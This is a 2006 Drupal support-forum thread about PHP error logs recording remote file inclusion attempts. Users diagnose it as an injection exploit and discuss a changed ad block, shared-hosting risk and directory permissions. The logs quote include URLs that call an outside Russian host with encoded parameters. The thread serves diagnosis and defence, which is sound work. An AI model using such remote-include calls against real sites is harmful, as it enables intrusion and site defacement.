By allitbooks on
I am getting logs full of this, 32 pages!, ever since the 041606. What the hell is causing this and how do I get rid of it? I have disabled user regs and deleted all the users(only about 30) as my site doesnt really require them. 4.6.3 version to be specific.
error php 2006-04-18 10:46 main(): Failed opening 'http://user7.phpinclude.ru/?YWxsaXRib29r anonymous reader details
error php 2006-04-18 10:46 main(http://user7.phpinclude.ru/?YWxsaXRib29rcy5uZXQ=.d3d3LmFsbG anonymous reader details
error php 2006-04-18 10:46 main(): Failed opening 'http://user7.phpinclude.ru/?YWxsaXRib29r anonymous reader details
error php 2006-04-18 10:46 main(http://user7.phpinclude.ru/?YWxsaXRib29rcy5uZXQ=.d3d3LmFsbG anonymous reader details
Comments
more log info
Here is the 'details' info from the main log. The IP calling it is from googlebot.com(66.249.65.167). But this is not the cause.
[edited for display purposes, so everyone can see it's an 'include' attempt - Heine]
one last piece
The only thing that I can see that has changed is the instead of having a 792x15 google ad at the top of the page - on some pages, it has gone to a google adsense search box. I have not changed this. See it at http://allitbooks.net
was it _your_ google id in
was it _your_ google id in the code?
google id
Yes it is my id in the code. The thing that troubles me is the 'user7.phpinclude.ru'. As far as I know I am not using anything from that site. The IP address for the host is not specific to thr googlebot. It is happening with almost if not every pageview.
i figured it was an exploit
i figured it was an injection exploit attempt. you said the google ad changed. a good idea by a hacker would be to change the google ad to his own code ;/
BAD
http://www.jaguarpc.com/forums/showthread.php?t=13305
http://forums.digitalpoint.com/showthread.php?t=56721
http://www.nomadig.com/journal/2006/04/16/hacking-attempt
edited to add: however, your site looks ok, when visited with user-agent Googlebot, or when l=special is POSTed.
edited to add: the remote includes your site tries to fetch (but fails to do so) contain php to print links eg:
--
Tips for posting to the forums.
When your problem is solved, please post a follow-up to the thread you started.
I cant be the only drupal
I cant be the only drupal user having this problem. Is anyone else seeing this type of hack on drupal? The part in the link about seperate shared server site being hacked and then possibly getting into mine is very sucky!
Lots
Lots of php based sites have been hacked. It could be via another site on the shared server, but since you are running an old version, also via your site.
--
Tips for posting to the forums.
When your problem is solved, please post a follow-up to the thread you started.
I have a lot of errors when
I have a lot of errors when a robot goes to a url, but adds a space before or after the url. I figure it's just a stupid spammer though, or could be a problem with my theme that most browsers fix. Who knows.
--
Bradlis7.com | Churchofchristnet
Correct permissions for "files" directory and subdirectories
I also was hit by this exploit on a Drupal-powered Civispace 0.83 beta installation.
Apparently I have the permissions set too loosly for the files directory and the subdirectories:
Can someone please let me know the proper permission settings for these directories, or, better yet, direct me to a documentation page that details the proper permissions for a complete Drupal/Civispace installation!
Thanks!
David